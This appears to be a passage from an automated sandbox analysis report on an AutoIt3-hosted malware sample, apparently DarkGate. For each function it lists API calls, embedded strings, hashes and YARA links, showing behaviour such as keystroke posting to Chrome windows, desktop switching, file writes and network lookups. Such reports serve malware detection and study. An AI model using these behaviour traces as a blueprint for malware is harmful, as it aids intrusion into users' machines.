Opcode ID: 3118970f178b90d427b6b5b5e08da48c024ea9882dd8577e2c96db4e4865d527
Instruction ID: 86788b22d465535d482a2452d426e0eba0670c4b770aed391d8aabd612865d78
Opcode Fuzzy Hash: 3118970f178b90d427b6b5b5e08da48c024ea9882dd8577e2c96db4e4865d527
Instruction Fuzzy Hash: A361AB31905701DFDB259F19C989B2AB7B1FB40312F50952DF4AA8BA60C770BD90EFA0

Function 046F2C4C Relevance: 18.2, APIs: 9, Strings: 3, Instructions: 151COMMON

Download Yara Rule

APIs

CharNextA.USER32(00000000), ref: 046F2CA1
CharNextA.USER32(00000000,00000000), ref: 046F2CAD
CharNextA.USER32(00000000,00000000), ref: 046F2CD5
CharNextA.USER32(00000000), ref: 046F2CE1
CharNextA.USER32(?,00000000), ref: 046F2D22
CharNextA.USER32(00000000,?,00000000), ref: 046F2D2E
CharNextA.USER32(00000000,?,00000000), ref: 046F2D66
CharNextA.USER32(?,00000000), ref: 046F2D72

Strings

", xrefs: 046F2D57
", xrefs: 046F2CC6
, xrefs: 046F2C74

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CharNext
String ID: $"$"
API String ID: 3213498283-938660540
Opcode ID: d76b6683da4a855a2cc87ee1813752cd7c38fd5dfaf21614363d10ae47ddbd4c
Instruction ID: 10d5ddfcd77887c5a11062c1b039a4fb89c89ab7f7c816d74ef4b6790b346718
Opcode Fuzzy Hash: d76b6683da4a855a2cc87ee1813752cd7c38fd5dfaf21614363d10ae47ddbd4c
Instruction Fuzzy Hash: 7F51E5B4608281AFE361DFA8C894A55BBE5EF2A340B24089DE6C5CB351F336B940DF54

Function 00C42581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00C429AB: GetWindowLongW.USER32(?,000000EB), ref: 00C429BC

GetSysColor.USER32(0000000F), ref: 00C425AF

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 26757ee5a8086157b3cdfa8a4d3e7916fff7518d01596372a4ae2db5e145ea4e
Instruction ID: cddcb0583fcfdc83b5db8ee6965fd5933001abf6797c8d9d7c729d075568c63d
Opcode Fuzzy Hash: 26757ee5a8086157b3cdfa8a4d3e7916fff7518d01596372a4ae2db5e145ea4e
Instruction Fuzzy Hash: 5341B271105140AFDB219F2C9889BFD3766FB0A331F6A4266FD758A1E2D7308E41EB21

Function 00C529BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00C60B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00C52A3E,?,00008000), ref: 00C60BA7

Part of subcall function 00C60284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C52A58,?,00008000), ref: 00C602A4

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C52ADF
SetCurrentDirectoryW.KERNEL32(?), ref: 00C52C2C

Part of subcall function 00C53EBE: _wcscpy.LIBCMT ref: 00C53EF6

Part of subcall function 00C6386D: _iswctype.LIBCMT ref: 00C63875

Strings

#include depth exceeded. Make sure there are no recursive includes, xrefs: 00C8FD17
Bad directive syntax error, xrefs: 00C9008F
AU3!, xrefs: 00C52A93
EA06, xrefs: 00C8FD48
Unterminated string, xrefs: 00C900D6
Error opening the file, xrefs: 00C8FD33, 00C8FDAA

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-3738523708
Opcode ID: b81fb09e02f30dc1376d3ba41250711c6c0db90f1d4a35d5f5a162e9af7a967d
Instruction ID: 8259026d444ee886c5cc5e533af2ec1c4aa1f4e3d8a7c557efbedf557ab4ef08
Opcode Fuzzy Hash: b81fb09e02f30dc1376d3ba41250711c6c0db90f1d4a35d5f5a162e9af7a967d
Instruction Fuzzy Hash: A602C4341083419FC724EF24C891AAFBBE5FF95345F14091DF99A932A2DB30DA89DB46

Function 04742598 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 275windowsleepthreadCOMMON

Download Yara Rule

APIs

SetThreadDesktop.USER32(00000000,00000000,04742924,?,?,?,?,0000000E,00000000,00000000), ref: 047425CD
GetWindowRect.USER32(00000000,?), ref: 047425DC
Sleep.KERNEL32(00000032,00000000,?,00000000,00000101,?,001E0001,?,?,||-_-|-_-||,?,?,?,?,?,0000000E), ref: 047425F8
GetWindowRect.USER32(00000000,?), ref: 04742617

Part of subcall function 0471794C: Sleep.KERNEL32(00000064,00000000,04717A31,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 047179FE

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000006,?,?,||-_-|-_-||,?,?,?,?,?,0000000E), ref: 047427C1
PostMessageA.USER32(00000000,00000100,?,001E0001), ref: 0474289F
PostMessageA.USER32(00000000,00000101,?,001E0001), ref: 047428B2
PostMessageA.USER32(00000000,00000102,?,00000000), ref: 047428CE

Strings

Chrome Legacy Window, xrefs: 047425E6, 04742602
||-_-|-_-||, xrefs: 04742734, 0474278C, 047427D3, 04742813, 04742854

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: MessagePostWindow$RectSleep$DesktopThread
String ID: Chrome Legacy Window$||-_-|-_-||
API String ID: 389509467-2894887002
Opcode ID: ac565e12f09ddd603c4172bc1da555aae32f52d51973be8507d9dfe16cc9de6e
Instruction ID: 8b9ffab1df120e32b8865388ae9dfec4fe5eb687ce12d225bb4837a1f49f97ff
Opcode Fuzzy Hash: ac565e12f09ddd603c4172bc1da555aae32f52d51973be8507d9dfe16cc9de6e
Instruction Fuzzy Hash: 84B13F71A102089FEB10EBE8D884AEEB7F5EF88344F1044A9E510BB352DB34FD558B54

Function 00CB8AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00C44D37: __itow.LIBCMT ref: 00C44D62
Part of subcall function 00C44D37: __swprintf.LIBCMT ref: 00C44DAC

CoInitialize.OLE32 ref: 00CB8AED
CoUninitialize.OLE32 ref: 00CB8AF8
CoCreateInstance.OLE32(?,00000000,00000017,00CD3BBC,?), ref: 00CB8B58
IIDFromString.OLE32(?,?), ref: 00CB8BCB
VariantInit.OLEAUT32(?), ref: 00CB8C65
VariantClear.OLEAUT32(?), ref: 00CB8CC6

Strings

Invalid parameter, xrefs: 00CB8BE4
NULL Pointer assignment, xrefs: 00CB8B9D
Failed to create object, xrefs: 00CB8B63, 00CB8C19

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 71cd6d54272d6c8d3090827740b475d2e2e261a5d1eca48efee195a53c4ea9ff
Instruction ID: a9710d24635ab8bd0e503c0e6d77bee25581e87a105bb62372bafb5a85f18e78
Opcode Fuzzy Hash: 71cd6d54272d6c8d3090827740b475d2e2e261a5d1eca48efee195a53c4ea9ff
Instruction Fuzzy Hash: FE618EB02057119FD710DF64C889FAEBBE8BF45714F100859F9959B291CB70EE48DBA2

Function 04743704 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000080,00000000,00000000,047438CE,?,?,00000000,00000000), ref: 04743768
ReadFile.KERNEL32(000000FF,0474305A,00000000,?,00000000,00000000), ref: 047437B7
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000001,00000000,00000000), ref: 047437F6
SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,000000FF,00000000,00000000,00000001,00000000,00000000), ref: 04743811
WriteFile.KERNEL32(000000FF,?,?,?,00000000,000000FF,?,00000000,00000000,000000FF,00000000,00000000,00000001,00000000,00000000), ref: 04743827
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,000000FF,0474305A,00000000,?,00000000,00000000), ref: 04743849
WriteFile.KERNEL32(000000FF,?,00000000,?,00000000,000000FF,00000000,00000000,00000002,000000FF,0474305A,00000000,?,00000000,00000000), ref: 04743865
CloseHandle.KERNEL32(000000FF,047438A5,?,00000000,00000000), ref: 04743898

Strings

darkgate, xrefs: 04743744

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: File$Pointer$Write$CloseCreateHandleRead
String ID: darkgate
API String ID: 3484830659-757439335
Opcode ID: b8c626752000aa07734cc7ac15da4a92b70180faba91f8dce5700e32cf1d9903
Instruction ID: 7fc68748156ffe8d72e59bdef1b0d8442e414272643e171dea49b5748687c967
Opcode Fuzzy Hash: b8c626752000aa07734cc7ac15da4a92b70180faba91f8dce5700e32cf1d9903
Instruction Fuzzy Hash: D0511C71B00208ABEB01DBA8DC51FEEB7B8EB48714F504065EA18F7380D775B941CB65

Function 0470CE80 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 114COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(00000000,00000000,?,?), ref: 0470CEDF
getaddrinfo.WS2_32(00000000,00000000,00000001,?), ref: 0470CF22
FreeAddrInfoW.WS2_32(00000000), ref: 0470CFBD

Strings

::1, xrefs: 0470CF3D
::0, xrefs: 0470CEFD
127.0.0.1, xrefs: 0470CF2F
0.0.0.0, xrefs: 0470CEEF

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: getaddrinfo$AddrFreeInfo
String ID: 0.0.0.0$127.0.0.1$::0$::1
API String ID: 3931047987-1239866159
Opcode ID: 78a3d0686e4d9d9f34f554140f8301c0e1b4d83e533c96593161a4ae42ac3baa
Instruction ID: c3755bf748d31627eebcba27d20ffc2b1d27cd5be7e7a4c5259441317ef65636
Opcode Fuzzy Hash: 78a3d0686e4d9d9f34f554140f8301c0e1b4d83e533c96593161a4ae42ac3baa
Instruction Fuzzy Hash: AC415176A01208EFDB05DFA4CC44ADEBBE8EB58314F15856AF501E7780EA34F9448B65

Function 00C7C0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00C4260D
SetTextColor.GDI32(?,000000FF), ref: 00C42617
SetBkMode.GDI32(?,00000001), ref: 00C4262C
GetStockObject.GDI32(00000005), ref: 00C42634
GetClientRect.USER32(?), ref: 00C7C0FC
SendMessageW.USER32(?,00001328,00000000,?), ref: 00C7C113
GetWindowDC.USER32(?), ref: 00C7C11F
GetPixel.GDI32(00000000,?,?), ref: 00C7C12E
ReleaseDC.USER32(?,00000000), ref: 00C7C140
GetSysColor.USER32(00000005), ref: 00C7C15E

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: a10ecaf5c519676c59467d821b8d7ad99bff16bac890945d43cdca539d528ed8
Instruction ID: ff2bd39865807b371f10a586232e048a012e4b6b5e7cc46ef785ca07963f6a67
Opcode Fuzzy Hash: a10ecaf5c519676c59467d821b8d7ad99bff16bac890945d43cdca539d528ed8
Instruction Fuzzy Hash: 2A114C31501205BFDB615FB8EC49BEE7BB1FB08321F604266FA69950E1CB314A51EF11

Function 0470D390 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 218networkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(00000000), ref: 0470D3E3
gethostbyname.WS2_32(00000000), ref: 0470D409
getaddrinfo.WS2_32(00000000,00000000,?,?), ref: 0470D4FD
FreeAddrInfoW.WS2_32(00000000), ref: 0470D5CF

Strings

%d.%d.%d.%d, xrefs: 0470D466
, xrefs: 0470D539
0.0.0.0, xrefs: 0470D5E9

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: AddrFreeInfogetaddrinfogethostbynameinet_addr
String ID: $%d.%d.%d.%d$0.0.0.0
API String ID: 2886313179-1131994233
Opcode ID: a5733feef7dd07786b64771f49e6b137b1dfdce4d873516de45707841a466fe1
Instruction ID: a7556adfd7b57a8d92458ffdbe08cbc0d31503040425923d5aedefec9ea30ee4
Opcode Fuzzy Hash: a5733feef7dd07786b64771f49e6b137b1dfdce4d873516de45707841a466fe1
Instruction Fuzzy Hash: BC810974A01248DFDB21DFA8C884AAEBBF8EB49314F518466E854E7751EB34ED41CF50

Function 047199C4 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 179COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 04719A93

Strings

veracrypt, xrefs: 04719C2B
explorer, xrefs: 04719AF0
proce, xrefs: 04719BEC
vbc.exe, xrefs: 04719B2F
update, xrefs: 04719BAD
lp.txt, xrefs: 04719A13, 04719A3D
conhost.exe, xrefs: 04719B6E

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CurrentProcess
String ID: conhost.exe$explorer$lp.txt$proce$update$vbc.exe$veracrypt
API String ID: 2050909247-3686906338
Opcode ID: a5e1efecfe65fd6cb2380703c845bd90dabe1caad07474e2fa838a23240a3c0f
Instruction ID: 3e0fce7ea3c0ad5122068a2724722582d273dbda73c186d5f6c15055eabd2f6b
Opcode Fuzzy Hash: a5e1efecfe65fd6cb2380703c845bd90dabe1caad07474e2fa838a23240a3c0f
Instruction Fuzzy Hash: 5671E2B060011D8BEB20EB64CD90ADDB3B5EF55309F4045E59A8867764FA70BF8ACF94

Function 00CCC634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C429E2: GetWindowLongW.USER32(?,000000EB), ref: 00C429F3

Part of subcall function 00C42714: GetCursorPos.USER32(?), ref: 00C42727
Part of subcall function 00C42714: ScreenToClient.USER32(00D077B0,?), ref: 00C42744
Part of subcall function 00C42714: GetAsyncKeyState.USER32(00000001), ref: 00C42769
Part of subcall function 00C42714: GetAsyncKeyState.USER32(00000002), ref: 00C42777

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00CCC69C
ImageList_EndDrag.COMCTL32 ref: 00CCC6A2
ReleaseCapture.USER32 ref: 00CCC6A8
SetWindowTextW.USER32(?,00000000), ref: 00CCC752
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00CCC765
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00CCC847

Strings

@GUI_DRAGFILE, xrefs: 00CCC7DC
@GUI_DROPID, xrefs: 00CCC799

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 332d1d9cf91974e579fd9ae66e9ee53a728e7b30790c7deabbf4cb7bdc12a4bb
Instruction ID: 4eba52f561831a1398b3a4a538b7c12c6cd5004256000b0a55245ac9ce331c70
Opcode Fuzzy Hash: 332d1d9cf91974e579fd9ae66e9ee53a728e7b30790c7deabbf4cb7bdc12a4bb
Instruction Fuzzy Hash: 2C517B70604304AFD704EF24CC9AF6A7BE5FB84310F14851DF9998B2E2DB70A949DB62

Function 00CB20E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CB211C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00CB2148
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00CB218A
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00CB219F
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CB21AC
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00CB21DC
InternetCloseHandle.WININET(00000000), ref: 00CB2223

Part of subcall function 00CB2B4F: GetLastError.KERNEL32(?,?,00CB1EE3,00000000,00000000,00000001), ref: 00CB2B64
Part of subcall function 00CB2B4F: SetEvent.KERNEL32(?,?,00CB1EE3,00000000,00000000,00000001), ref: 00CB2B79

Strings

, xrefs: 00CB21CD

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 2d13299ec7fff715260233901d2d96b9babc30d31b84342f8042687f00957876
Instruction ID: 8e052a192d8826f17596c334ac4aaa54257b22ed08d945563a7e53d4c3a94e9d
Opcode Fuzzy Hash: 2d13299ec7fff715260233901d2d96b9babc30d31b84342f8042687f00957876
Instruction Fuzzy Hash: 67417CB1501208BFEB129F54CC89FFF7BACEF08350F10411AFA159A151DB709E449BA1

Function 0179E8A9 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0179E711: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0179E72D
Part of subcall function 0179E711: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0179E751
Part of subcall function 0179E711: GetModuleFileNameA.KERNEL32(00C40000,?,00000105), ref: 0179E76C
Part of subcall function 0179E711: LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 0179E810

CharToOemA.USER32(?,?), ref: 0179E8E0
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0179E8FD
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0179E903
GetStdHandle.KERNEL32(000000F4,0179E96D,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0179E918
WriteFile.KERNEL32(00000000,000000F4,0179E96D,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0179E91E
LoadStringA.USER32(00000000,0000FFE8,?,00000040), ref: 0179E940
MessageBoxA.USER32(00000000,?,?,00002010), ref: 0179E956

Strings

PRQ4&, xrefs: 0179E8D1

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID: PRQ4&
API String ID: 185507032-145234664
Opcode ID: b6ec0139d3c631c9c25d88d94b08773312000c22e0583c40c93aab21d6ef6b1b
Instruction ID: cfe19a9f270c058ae5c42473d3ca250bfb1d279dd78beb4a778c313e84feab6e
Opcode Fuzzy Hash: b6ec0139d3c631c9c25d88d94b08773312000c22e0583c40c93aab21d6ef6b1b
Instruction Fuzzy Hash: 18115EB1108206BFEF01EBA4EC89F9EF3ECAB55710F804516B754D7094DA70E9088762

Function 00C9A226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C9B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C9B54D
Part of subcall function 00C9B52D: GetCurrentThreadId.KERNEL32 ref: 00C9B554
Part of subcall function 00C9B52D: AttachThreadInput.USER32(00000000,?,00C9A23B,?,00000001), ref: 00C9B55B

MapVirtualKeyW.USER32(00000025,00000000), ref: 00C9A246
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C9A263
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00C9A266
MapVirtualKeyW.USER32(00000025,00000000), ref: 00C9A26F
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C9A28D
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C9A290
MapVirtualKeyW.USER32(00000025,00000000), ref: 00C9A299
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C9A2B0
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C9A2B3

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: bc9f712e4c5d13861081925b12789db24d91534aa10f03f65018d7f63df917c5
Instruction ID: 206b0a022567d4cb08d557583929d7f46fb156a04149abe5f4f8b69d2ea15675
Opcode Fuzzy Hash: bc9f712e4c5d13861081925b12789db24d91534aa10f03f65018d7f63df917c5
Instruction Fuzzy Hash: 221104B1950A18BEFA106F649C8EF6E7F2DEB8C751F21041AF7446B0D0CAF35C509AA0

Function 00CBA20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00CBA28E, 00CBA5B2
Not an Object type, xrefs: 00CBA265

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: f53a485c0099967e9a2f4d27f6427220819cc1753f3a1c20c0705d069e2be558
Instruction ID: 8b2d7d24b44ff782fa8c31aad297f2953b1e80e2189826975d64c06ec202ca7c
Opcode Fuzzy Hash: f53a485c0099967e9a2f4d27f6427220819cc1753f3a1c20c0705d069e2be558
Instruction Fuzzy Hash: 9AC18071A0021A9FDF24CFA8C884BEEB7F5FB48314F148469E955AB280E770DE45CB91

Function 0179F5AD Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,0179F878,?,?,00000000,00000000), ref: 0179F5E3

Part of subcall function 0179E1A5: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0179E1C3

Strings

m/d/yy, xrefs: 0179F6B2
AMPM, xrefs: 0179F7F7
:mm, xrefs: 0179F816
mmmm d, yyyy, xrefs: 0179F6DF
:mm:ss, xrefs: 0179F833
AMPM , xrefs: 0179F806

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: 80710cf03688fd9fa8f450c3dae0805d4bde1ea5f80dba85c2bc33084f6d98cf
Instruction ID: c1939ea772c46b9d0d1fb0bd62b167b112c5d4635b56c00e351dabc42a7889b3
Opcode Fuzzy Hash: 80710cf03688fd9fa8f450c3dae0805d4bde1ea5f80dba85c2bc33084f6d98cf
